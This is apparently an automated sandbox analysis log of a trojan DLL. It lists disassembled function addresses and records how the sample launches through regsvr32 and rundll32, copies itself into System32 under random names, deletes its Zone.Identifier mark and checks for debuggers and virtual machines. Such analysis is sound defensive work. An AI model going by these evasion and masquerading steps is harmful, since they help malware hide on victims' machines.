                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0497670B7_2_0497670B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498FF587_2_0498FF58
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498654A7_2_0498654A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049821427_2_04982142
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04980ABA7_2_04980ABA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049946BD7_2_049946BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04980EBC7_2_04980EBC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0497C6B87_2_0497C6B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04983EAA7_2_04983EAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049936AA7_2_049936AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04971CA17_2_04971CA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498A2A57_2_0498A2A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0497BAA97_2_0497BAA9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498CCD97_2_0498CCD9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498D8DB7_2_0498D8DB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498CAD57_2_0498CAD5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049780C07_2_049780C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498BEFD7_2_0498BEFD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04993EE97_2_04993EE9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049900EF7_2_049900EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498E4E57_2_0498E4E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0497F0E97_2_0497F0E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04989A017_2_04989A01
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049888067_2_04988806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049734317_2_04973431
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0497B8207_2_0497B820
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04982E5D7_2_04982E5D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498B2577_2_0498B257
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049774427_2_04977442
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0497E6407_2_0497E640
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498F8407_2_0498F840
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049842447_2_04984244
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498567B7_2_0498567B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0497A8717_2_0497A871
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498DC717_2_0498DC71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498A4747_2_0498A474
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04977E797_2_04977E79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049770787_2_04977078
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049932637_2_04993263
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04990A647_2_04990A64
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049721947_2_04972194
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0497FB8E7_2_0497FB8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0497238C7_2_0497238C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04983D857_2_04983D85
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04980F867_2_04980F86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049861877_2_04986187
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498D1BC7_2_0498D1BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049917BD7_2_049917BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0497BFBE7_2_0497BFBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049757B87_2_049757B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049907AA7_2_049907AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049777A37_2_049777A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04988FAE7_2_04988FAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498FBDE7_2_0498FBDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0497E7DE7_2_0497E7DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498C5D57_2_0498C5D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498E1F87_2_0498E1F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049827F97_2_049827F9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049885FF7_2_049885FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049755FF7_2_049755FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04974BFC7_2_04974BFC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049807F47_2_049807F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04989DF57_2_04989DF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049867E67_2_049867E6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049855157_2_04985515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04992B097_2_04992B09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0497EF0C7_2_0497EF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04988D3D7_2_04988D3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049853337_2_04985333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04971F387_2_04971F38
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04987D5B7_2_04987D5B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04992D537_2_04992D53
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498E9557_2_0498E955
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0497D14C7_2_0497D14C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049857797_2_04985779
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498437A7_2_0498437A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498017B7_2_0498017B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04984F747_2_04984F74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049897747_2_04989774
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04976B7A7_2_04976B7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0497F3697_2_0497F369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E785FF9_2_02E785FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E7EFDD9_2_02E7EFDD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E83EE99_2_02E83EE9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E7E4E59_2_02E7E4E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E800EF9_2_02E800EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E6F0E99_2_02E6F0E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E7BEFD9_2_02E7BEFD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E680C09_2_02E680C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E7CAD59_2_02E7CAD5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E7D8DB9_2_02E7D8DB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E7CCD99_2_02E7CCD9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E7A2A59_2_02E7A2A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E836AA9_2_02E836AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E61CA19_2_02E61CA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E73EAA9_2_02E73EAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E6BAA99_2_02E6BAA9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E846BD9_2_02E846BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E70EBC9_2_02E70EBC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E70ABA9_2_02E70ABA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E6C6B89_2_02E6C6B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E74A669_2_02E74A66
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E832639_2_02E83263
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E80A649_2_02E80A64
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E6DE749_2_02E6DE74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E7A4749_2_02E7A474
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E7DC719_2_02E7DC71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E6A8719_2_02E6A871
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E7567B9_2_02E7567B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E670789_2_02E67078
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E67E799_2_02E67E79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E6A4459_2_02E6A445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E742449_2_02E74244
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E674429_2_02E67442
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E6E6409_2_02E6E640
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E7F8409_2_02E7F840
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E7B2579_2_02E7B257
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E72E5D9_2_02E72E5D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E6B8209_2_02E6B820
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E686369_2_02E68636
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E634319_2_02E63431
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E820099_2_02E82009
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E788069_2_02E78806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E79A019_2_02E79A01
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E77A0F9_2_02E77A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E767E69_2_02E767E6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E79DF59_2_02E79DF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E655FF9_2_02E655FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E64BFC9_2_02E64BFC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E7E1F89_2_02E7E1F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E7C5D59_2_02E7C5D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E6E7DE9_2_02E6E7DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E6C5D89_2_02E6C5D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E807AA9_2_02E807AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E677A39_2_02E677A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E78FAE9_2_02E78FAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E817BD9_2_02E817BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E6BFBE9_2_02E6BFBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E7D1BC9_2_02E7D1BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E657B89_2_02E657B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E761879_2_02E76187
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E70F869_2_02E70F86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E73D859_2_02E73D85
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E6FB8E9_2_02E6FB8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E6238C9_2_02E6238C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E621949_2_02E62194
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E6F3699_2_02E6F369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E74F749_2_02E74F74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E797749_2_02E79774
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E66B7A9_2_02E66B7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E7017B9_2_02E7017B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E757799_2_02E75779
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E721429_2_02E72142
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E6D14C9_2_02E6D14C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E7654A9_2_02E7654A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E7E9559_2_02E7E955
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E82D539_2_02E82D53
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E77D5B9_2_02E77D5B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E7FF589_2_02E7FF58
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E753339_2_02E75333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E78D3D9_2_02E78D3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E61F389_2_02E61F38
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E82B099_2_02E82B09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E6EF0C9_2_02E6EF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E6670B9_2_02E6670B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E7AD089_2_02E7AD08
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E755159_2_02E75515
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10017BC1 appears 67 times
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 1001984C appears 48 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10017BC1 appears 68 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001984C appears 48 times
                      Source: pugKLanrj3.dllBinary or memory string: OriginalFilenameUDPTool.EXE: vs pugKLanrj3.dll
                      Source: pugKLanrj3.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: pugKLanrj3.dllVirustotal: Detection: 26%
                      Source: pugKLanrj3.dllReversingLabs: Detection: 32%
                      Source: pugKLanrj3.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pugKLanrj3.dll
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pugKLanrj3.dll,DllRegisterServer
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",DllRegisterServer
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",DllRegisterServer
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ubjbeaftth\ufcmfnoys.ulp",EgkecrKVKe
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Ubjbeaftth\ufcmfnoys.ulp",DllRegisterServer
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pugKLanrj3.dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pugKLanrj3.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",DllRegisterServerJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",DllRegisterServerJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ubjbeaftth\ufcmfnoys.ulp",EgkecrKVKeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Ubjbeaftth\ufcmfnoys.ulp",DllRegisterServerJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: classification engineClassification label: mal96.troj.evad.winDLL@21/2@0/28
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",#1
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100126F9 FindResourceA,LoadResource,LockResource,FreeResource,2_2_100126F9
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: pugKLanrj3.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: pugKLanrj3.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: pugKLanrj3.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: pugKLanrj3.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: pugKLanrj3.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10019891 push ecx; ret 2_2_100198A4
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10017C60 push ecx; ret 2_2_10017C73
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10019891 push ecx; ret 3_2_100198A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10017C60 push ecx; ret 3_2_10017C73
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03091195 push cs; iretd 3_2_03091197
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A08E0 push esp; iretd 3_2_030A08E3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006C1195 push cs; iretd 4_2_006C1197
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04971195 push cs; iretd 7_2_04971197
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E708E0 push esp; iretd 9_2_02E708E3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02E61195 push cs; iretd 9_2_02E61197
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10023A79 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,2_2_10023A79
                      Source: pugKLanrj3.dllStatic PE information: real checksum: 0x66354 should be: 0x68650
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pugKLanrj3.dll
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Ubjbeaftth\ufcmfnoys.ulpJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ubjbeaftth\ufcmfnoys.ulp:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Xsanfz\urubdibogzamw.hym:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1000D804 IsIconic,GetWindowPlacement,GetWindowRect,2_2_1000D804
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10008B90 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,2_2_10008B90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000D804 IsIconic,GetWindowPlacement,GetWindowRect,3_2_1000D804
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10008B90 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,3_2_10008B90
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 5380Thread sleep time: -90000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-17944
                      Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 4.3 %
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 4.9 %
                      Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_2-17946
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-20790
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: svchost.exe, 00000011.00000002.435659671.0000024AA74EF000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000011.00000002.435533157.0000024AA7472000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001C49A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_1001C49A
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10023A79 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,2_2_10023A79
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100178B6 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,2_2_100178B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0309F7F7 mov eax, dword ptr fs:[00000030h]3_2_0309F7F7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006CF7F7 mov eax, dword ptr fs:[00000030h]4_2_006CF7F7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0497F7F7 mov eax, dword ptr fs:[00000030h]7_2_0497F7F7
